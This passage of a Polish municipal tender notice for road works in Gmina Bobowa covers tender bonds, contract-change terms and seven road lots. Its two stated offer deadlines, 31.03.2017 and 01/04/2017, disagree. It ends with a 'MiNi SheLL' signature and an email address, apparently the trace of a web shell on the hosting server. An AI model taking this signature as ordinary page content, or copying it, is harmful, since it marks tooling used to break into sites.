VI  11 000,00 PLN (słownie złotych: jedenaście tysięcy zł)
VII  17 000,00 PLN (słownie złotych: siedemnaście tysięcy zł)
nie później niż w terminie składania ofert.
2.Wadium może być wniesione:
a)w pieniądzu  wyłącznie przelewem na rachunek bankowy wskazany poniżej,
b)poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c)gwarancjach bankowych,
d)gwarancjach ubezpieczeniowych,
e)poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2014 r., poz. 1804 oraz z 2015 r. poz. 978 i 1240).
3.Zamawiający odrzuci ofertę Wykonawcy na podstawie art. 89 ust. 1 pkt 7b ustawy, jeżeli wadium nie zostanie wniesione lub zostanie wniesione w sposób nieprawidłowy.
4.Wadium w pieniądzu:
a)wadium w formie przelewu należy wpłacić na konto Zamawiającego: Bank Spółdzielczy w Grybowie, Oddział w Bobowej Nr 02 8797 1013 0010 0100 0202 0006 z zaznaczeniem, że dotyczy przetargu pn.: Przebudowa i zmiana nawierzchni dróg na terenie Gminy Bobowa  etap I  Część nr  pn.: 
b)wadium wniesione w pieniądzu uważa się za wniesione w terminie, jeżeli                        w momencie upływu terminu składania ofert tj. do dnia 31.03.2017 r. do godz. 8.30  przelew zostanie zrealizowany i kwota wadium zostanie uznana na rachunku bankowym Zamawiającego Zamawiający określa porządkowy wymóg załączenia do oferty kserokopii przelewu,
c)Zamawiający dokona sprawdzenia czasu wpływu wadium na swoje konto.
5.Wadium w pozostałych formach dopuszczonych specyfikacją:
a)oryginał dokumentu poręczenia lub gwarancji, o których mowa w pkt. 2 lit. b)- e) należy załączyć do oferty przetargowej, albo
b)alternatywnie oryginał można złożyć w siedzibie Zamawiającego tj. w Kasie Urzędu Miejskiego w Bobowej, ul. Rynek 21  w godzinach pracy Kasy Urzędu (pn.  pt.: 7.30  15.30), natomiast (wymóg porządkowy) kserokopię dokumentu oraz potwierdzenie złożenia dokumentu w ww. kasie (z określeniem dnia i godziny złożenia) załączyć do oferty;
c)wadium składane w tych formach musi mieć datę początkową ważności równą co najmniej ostatecznemu terminowi składania ofert, a datę końcową ważności upływającą najwcześniej w ostatnim dniu związania ofertą. W razie zawieszenia biegu terminu związania ofertą lub przedłużenia terminu składania ofert, końcowy termin ważności wadium, o którym mowa w pkt 2 lit. b), c), d), e) albo zostanie przedłużony przez Wykonawcę, albo wniesie on nowe wadium na przedłużony okres;
6.Zamawiający zastrzega, że w razie składania gwarancji lub poręczeń jako zabezpieczenia należytego wykonania umowy lub wadium przetargowego:
a)gwarancje oraz poręczenia powinny być wystawione na Gminę Bobowa,  w treści tych gwarancji oraz poręczeń nie mogą znaleźć się żadne postanowienia ograniczające prawo Zamawiającego do ich realizacji;
b)gwarancje oraz poręczenia muszą określać bezwarunkowe prawo Zamawiającego do ich realizacji, na pierwsze pisemne żądanie Zamawiającego;
c)gwarancje oraz poręczenia, w których ograniczono prawa Zamawiającego, lub w których uzależniono realizację od spełnienia jakichkolwiek warunków przez Zamawiającego do wykonania których Zamawiający nie wyraził zgody na piśmie, uznane zostaną jako nie spełniające warunków.
d)Wadium (złożenie, zwrot, zatrzymanie) realizowane będzie wg zasad określonych w ustawie.</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Przedłużenie terminu gwarancji</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br />Nie dotyczy.<br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br />Nie dotyczy.<br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br />Nie dotyczy.<br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.Zamawiający przewiduje możliwość dokonania zmian umowy  bez zmiany wynagrodzenia  w przypadkach:
1) określonych w art. 144 uPZP.
2) zmiany podwykonawcy, przy pomocy, którego wykonawca realizuje przedmiot umowy, zaakceptowanego przez zamawiającego,
3) zmiany podwykonawcy, udostępniającego zasoby niezbędne do realizacji zamówienia. W takim przypadku wykonawca jest zobowiązany zaproponować innego podwykonawcę spełniającego na dzień składania ofert warunki określone przez zamawiającego w SIWZ wraz z obowiązkiem załączenia wszystkich wymaganych oświadczeń i dokumentów z tym związanych.
2.Zamawiający przewiduje możliwość dokonania zmiany terminu realizacji umowy  bez zmiany wynagrodzenia - w przypadku wydłużenia terminu wyboru najkorzystniejszej oferty oraz zawarcia umowy ponad trzydziestodniowy (30) termin związania ofertą - tylko w zakresie przedłużenia terminu realizacji zamówienia i tylko o okres trwania tych czynności.
3.Zmiany, o których mowa w ustępie 1 lub ustępie 2 muszą zostać udokumentowane. Pismo (wniosek) dotyczące w/w zmian wraz z uzasadnieniem strona występująca z wnioskiem zobowiązana jest złożyć drugiej stronie najpóźniej na czternaście (14) dni kalendarzowych przed końcem trwania umowy.
4.Zamawiający nie dopuszcza zmiany terminu wykonania zamówienia w przypadkach zawinionych przez wykonawcę.
5.Za przedłużenie terminu realizacji zamówienia wykonawcy nie przysługuje dodatkowe wynagrodzenie.
6.W przypadku wystąpienia którejkolwiek z okoliczności uzasadniających zmianę terminu wykonania umowy może on ulec odpowiedniemu przedłużeniu wyłącznie o czas niezbędny do zakończenia wykonania jej przedmiotu w sposób należyty.
7.Wszystkie powyższe okoliczności stanowią katalog zmian, na które zamawiający może wyrazić zgodę - nie stanowiąc jednocześnie obowiązku do wyrażenia takiej zgody.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 01/04/2017, godzina: 08:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Język polski.<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                tak
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>I
                  
                <b>Nazwa: </b>Zmiana nawierzchni drogi gminnej Nr 270093K Bobowa  ul. Św. Wawrzyńca  Pułanki w miejscowości Bobowa w km 0+000  1+180 wraz z przebudową pobocza na ciąg pieszy na działkach nr 916, 868/17, 868/13, 869/20, 868/15, 869/14, 869/18.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>W zakres robót wchodzi wykonanie:
- Roboty przygotowawcze
- Roboty rozbiórkowe (rozbiórka istniejącej nawierzchni bitumicznej)
- Roboty ziemne
- Wymiana nawierzchni bitumicznej na betonową 
- Przebudowa pobocza na chodnik z kostki betonowej 
- Przebudowa zjazdów do posesji przez chodnik (z kostki betonowej)
- Przebudowa zjazdów do posesji z wymianą nawierzchni żwirowej na betonową
- Roboty wykończeniowe (czyszczenie rowów i humusowanie skarp)
- Opracowanie projektu organizacji ruchu na czas prowadzenia robót wraz z uzgodnieniami<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233142-6, 45100000-8,
                    45110000-1,
                    45111200-0,
                    45200000-9,
                    45220000-5,
                    45222000-9,
                    45233000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 29/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Przedłużenie terminu gwarancji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>II
                  
                <b>Nazwa: </b>Przebudowa drogi gminnej Nr 270100 K Bobowa  Stadion Sportowy w miejscowości Bobowa w km 0+000  0+255 wraz z przebudową pobocza na ciąg pieszo-rowerowy na działkach nr 389/2, 388/2, 385/2.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>W zakres robót wchodzi wykonanie :
- Roboty przygotowawcze
- Roboty rozbiórkowe (rozbiórka istniejącej nawierzchni bitumicznej)
- Roboty ziemne
- Wymiana nawierzchni bitumicznej
- Przebudowa odcinka pobocza na ciąg pieszo  rowerowy  nawierzchnia z kostki betonowej
- Przebudowa zjazdów do posesji (nawierzchnia z kostki betonowej)
- Regulacja wysokościowa zjazdów warstwą żwirową  
- Roboty wykończeniowe (uzupełnienia poboczy i humusowanie skarp)
- Opracowanie projektu organizacji ruchu na czas prowadzenia robót wraz z uzgodnieniami<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233142-6, 45100000-8,
                    45110000-1,
                    45111200-0,
                    45200000-9,
                    45220000-5,
                    45222000-9,
                    45233000-9,
                    45233162-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 29/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Przedłużenie terminu gwarancji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>III
                  
                <b>Nazwa: </b>Przebudowa drogi gminnej Nr 270090K Bobowa  ul. 650-lecia w miejscowości Bobowa w km 0+000 -  0+ 689 wraz z przebudową pobocza na ciąg pieszy na działkach nr 1179, 1255, 850/1, 850/4, 823/4, 831/1, 851/4, 853/2, 796/21, 843/1, 824/2, 825/2, 826/6, 827/10, 827/7, 828/7, 830/6, 830/5, 839/2, 857, 797/1, 914.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>W zakres robót wchodzi wykonanie :
- Roboty przygotowawcze
- Roboty rozbiórkowe (rozbiórka istniejącej nawierzchni bitumicznej)
- Roboty ziemne
- Wymiana nawierzchni bitumicznej
- Przebudowa odcinka pobocza na ciąg pieszy  nawierzchnia z kostki betonowej
- Przebudowa zjazdów do posesji (nawierzchnia z kostki betonowej)
- Regulacja wysokościowa zjazdów 
- Roboty wykończeniowe (uzupełnienia poboczy i humusowanie skarp, oczyszczenie rowów)
- Opracowanie projektu organizacji ruchu na czas prowadzenia robót wraz z uzgodnieniami<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233142-6, 45100000-8,
                    45110000-1,
                    45111200-0,
                    45200000-9,
                    45220000-5,
                    45222000-9,
                    45233000-9,
                    45233162-2<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 29/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Przedłużenie terminu gwarancji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>IV
                  
                <b>Nazwa: </b>Zmiana nawierzchni drogi gminnej Nr 270082K Bobowa  Szkoła  Pułanki w miejscowości Bobowa w km do 0+515 do 1+017 wraz z zabezpieczeniem rowu na działce nr 914.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>W zakres robót wchodzi wykonanie :
- Roboty przygotowawcze (pomiary, obsługa geodezyjna)
- Roboty rozbiórkowe i ziemne (rozbiórka istniejącej nawierzchni bitumicznej, rozbiórka istniejącego umocnienia rowów z korytek betonowych i płyt ażurowych)
- Wykonanie podbudowy z kruszyw łamanych
- Wykonanie nawierzchni betonowej
- Regulacja wysokościowa zjazdów
- Zabezpieczenie rowów przydrożnych korytkiem ściekowym z umocnieniem płytami ażurowymi
- Roboty wykończeniowe (uzupełnienia poboczy, oczyszczanie rowów z namułu)
- Opracowanie projektu organizacji ruchu na czas prowadzenia robót wraz z uzgodnieniami<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233142-6, 45100000-8,
                    45110000-1,
                    45111200-0,
                    45200000-9,
                    45220000-5,
                    45222000-9,
                    45233000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 29/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Przedłużenie terminu gwarancji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>V
                  
                <b>Nazwa: </b>Przebudowa drogi gminnej Nr 270092K Bobowa  Rynek w miejscowości Bobowa w km 0+000  0+060 na działce nr 1240.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>W zakres robót wchodzi wykonanie :
- Roboty przygotowawcze ( pomiary, organizacja ruchu)
- Roboty rozbiórkowe i ziemne (rozbiórka istniejącej nawierzchni bitumicznej)
- Wykonanie wzmocnienia podbudowy
- Warstwa przeciwspękaniowa pod warstwy bitumiczne
- Wykonanie nawierzchni bitumicznej
- Wykonanie ścieków przykrawężnikowych z kostki kamiennej
- Opracowanie projektu organizacji ruchu na czas prowadzenia robót wraz z uzgodnieniami<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233142-6, 45100000-8,
                    45110000-1,
                    45111200-0,
                    45200000-9,
                    45220000-5,
                    45222000-9,
                    45233000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 29/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Przedłużenie terminu gwarancji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>VI
                  
                <b>Nazwa: </b>Zmiana nawierzchni drogi gminnej Nr 270120K Brzana  Piekło  Jankowa /Dół/  w miejscowości Brzana w km 0+000  0+850 na działce nr 691.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>W zakres robót wchodzi wykonanie :
- Roboty przygotowawcze
- Roboty rozbiórkowe (rozbiórka istniejącej nawierzchni betonowej i przepustów rurowych)
- Roboty ziemne
- Wymiana  przepustu pod drogą
- Wymiana nawierzchni betonowej na bitumiczną 
- Przebudowa zjazdów do posesji (nawierzchnia bitumiczna)
- Regulacja wysokościowa zjazdów
- Roboty wykończeniowe (uzupełnienia poboczy i humusowanie skarp)
- Opracowanie projektu organizacji ruchu na czas prowadzenia robót wraz z uzgodnieniami<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233142-6, 45100000-8,
                    45110000-1,
                    45111200-0,
                    45200000-9,
                    45220000-5,
                    45222000-9,
                    45233000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 29/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Przedłużenie terminu gwarancji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>VII
                  
                <b>Nazwa: </b>Przebudowa drogi gminnej Nr 270166K Siedliska  Tłoki w miejscowości Siedliska w km 0+000  1+080 na działkach nr 670, 675.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>W zakres robót wchodzi wykonanie :
- Roboty przygotowawcze
- Roboty rozbiórkowe (rozbiórka istniejącej nawierzchni bitumicznej)
- Wymiana nawierzchni bitumicznej
- Przebudowa zjazdów do posesji (nawierzchnia bitumiczna)
- Regulacja wysokościowa zjazdów warstwą żwirową 
- Oczyszczenie rowów
- Roboty wykończeniowe (uzupełnienia poboczy i humusowanie skarp, oczyszczenie rowów)
- Opracowanie projektu organizacji ruchu na czas prowadzenia robót wraz z uzgodnieniami<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>45233142-6, 45100000-8,
                    45110000-1,
                    45111200-0,
                    45200000-9,
                    45220000-5,
                    45222000-9,
                    45233000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 29/09/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Przedłużenie terminu gwarancji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com